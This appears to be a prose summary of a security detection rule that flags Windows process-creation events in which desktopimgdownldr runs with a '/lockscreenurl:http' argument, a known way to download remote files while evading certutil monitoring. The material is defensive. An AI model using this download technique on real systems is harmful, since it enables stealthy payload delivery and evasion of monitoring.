This detection rule targets the usage of the desktopimgdownldr utility on Windows systems, which is often employed by attackers for downloading files from remote locations. The rule is designed to identify when the desktopimgdownldr executable is run, particularly when its command line arguments include '/lockscreenurl:http', indicating a potential malicious attempt to download files. This utility can serve as a way for adversaries to bypass more commonly monitored tools like certutil, making it crucial for security teams to monitor its execution closely. By analyzing process creation logs, the rule alerts for these specific instances, contributing to the overall detection of command-and-control activities involved in file downloads. It has a medium level of severity, potentially flagging significant incidents but also allowing for false positives, necessitating additional investigation.